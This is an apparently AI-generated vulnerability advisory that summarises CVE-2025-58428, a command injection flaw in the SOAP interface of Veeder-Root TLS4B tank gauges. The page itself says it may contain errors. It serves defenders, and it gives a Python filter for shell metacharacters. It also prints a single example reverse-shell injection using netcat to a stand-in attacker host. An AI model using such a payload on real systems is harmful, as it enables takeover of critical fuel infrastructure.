Brief Summary of CVE-2025-58428: Command Injection in Veeder-Root TLS4B SOAP Interface

This post provides a brief summary of CVE-2025-58428, a critical command injection vulnerability in the SOAP-based interface of Veeder-Root TLS4B Automatic Tank Gauge systems. The flaw allows authenticated attackers to execute arbitrary system commands on the underlying Linux OS. Includes technical details, affected versions, and vendor security history.

ZeroPath CVE Analysis

2025-10-23

Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.


Introduction

Attackers with valid credentials can remotely execute arbitrary system commands on Veeder-Root TLS4B Automatic Tank Gauge systems, potentially gaining full shell access and moving laterally within critical infrastructure networks. This vulnerability, tracked as CVE-2025-58428 and rated CVSS 9.9, exposes fuel monitoring and management systems in sectors such as energy, transportation, and defense to significant operational and security risks.

About Veeder-Root and TLS4B: Veeder-Root is a global leader in automatic tank gauging, with over a century in the industry and more than half a million systems deployed worldwide. The TLS4B is a flagship product used for real-time fuel inventory, leak detection, and compliance in gas stations, airports, and other critical sites. Its extensive deployment and integration with facility networks make vulnerabilities in this platform especially impactful.

Technical Information

CVE-2025-58428 is a command injection flaw in the SOAP-based web services interface of the Veeder-Root TLS4B. The vulnerability arises when the web services handler processes user-supplied input from SOAP requests and passes it to shell execution functions on the underlying Linux OS without proper sanitization. Special shell metacharacters such as semicolons (;), pipes (|), and ampersands (&) are not neutralized, allowing attackers to append arbitrary commands to the intended input.

The root cause matches CWE-77 (Improper Neutralization of Special Elements used in a Command). Attackers must possess valid credentials and network access to the SOAP interface. By crafting a malicious SOAP request, an attacker can inject payloads that break out of the intended command context. For example, an attacker could append ; nc attacker.com 4444 -e /bin/bash to gain a reverse shell, or use similar payloads for data exfiltration or system manipulation. The web services process may run with elevated privileges, increasing the risk of full system compromise.
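As an added example (not code from ZeroPath, Veeder-Root, or any advisory), the Python function below screens a SOAP request body for shell metacharacters after XML decoding, the kind of check a filtering proxy in front of the interface could apply. The element names (SetLabel, tankId, label) and the namespace are hypothetical because no request format is public, and the character set goes beyond the three characters named above.

```python
import re
import xml.etree.ElementTree as ET

# Shell-special characters. The page names ; | & -- the others are added here.
SHELL_META = re.compile(r"[;|&`$<>\n\r]")

# Constructed request: SetLabel, tankId, label and the namespace are
# hypothetical; the real TLS4B SOAP schema is not public.
ENVELOPE = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><SetLabel xmlns="urn:example:atg">'
    "<tankId>3</tankId><label>{}</label>"
    "</SetLabel></soap:Body></soap:Envelope>"
)


def screen_soap_request(body):
    """Return [(element_name, [metachars])] for every suspicious value.

    Matching runs on parsed text, so an entity-encoded semicolon (&#59;)
    is caught as well as a literal one. Malformed XML raises ValueError
    so the caller can reject the request outright.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise ValueError(f"malformed SOAP body: {exc}") from exc
    findings = []
    for elem in root.iter():
        values = [elem.text or "", elem.tail or "", *elem.attrib.values()]
        hits = set()
        for value in values:
            hits.update(SHELL_META.findall(value.strip()))
        if hits:
            name = elem.tag.rsplit("}", 1)[-1]  # drop '{namespace}' prefix
            findings.append((name, sorted(hits)))
    return findings


if __name__ == "__main__":
    # Constructed sample values: one benign, three carrying metacharacters.
    for label in ("North tank 3", "north; echo test", "north&#59; echo test", "a &amp;&amp; b"):
        print(repr(label), "->", screen_soap_request(ENVELOPE.format(label)))
```

A pattern match on the raw request bytes would miss the `&#59;` case, which is why the check runs on the parsed values; a screen like this is a compensating control in front of the device, not a replacement for neutralizing input in the handler itself.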

No public code snippets or exploit scripts are available at this time. The vulnerability is confirmed to affect the SOAP interface and requires authentication, but the attack surface is significant due to the number of internet-exposed and poorly segmented ATG systems.

Affected Systems and Versions

  • Product: Veeder-Root TLS4B Automatic Tank Gauge
  • Vulnerable component: SOAP-based web services interface
  • Underlying OS: Linux
  • Specific affected versions: Not explicitly listed in public sources as of publication. All currently supported and internet-connected TLS4B systems with the SOAP interface enabled should be considered at risk until official vendor confirmation.
  • Vulnerable configuration: Systems with a network-accessible SOAP interface, where the attacker holds valid credentials

Vendor Security History

Veeder-Root has a history of security issues in its ATG product lines, including legacy protocol weaknesses and web interface vulnerabilities. Previous research (see Bitsight, CISA, and Dark Reading) has highlighted insecure default configurations, weak authentication, and lack of input validation in both legacy and modern ATG systems. The vendor has published network security reminders and configuration guides, but widespread internet exposure and legacy design choices have left many systems vulnerable. Patch response times have improved in recent years, but remediation is complicated by the operational constraints of critical infrastructure environments.
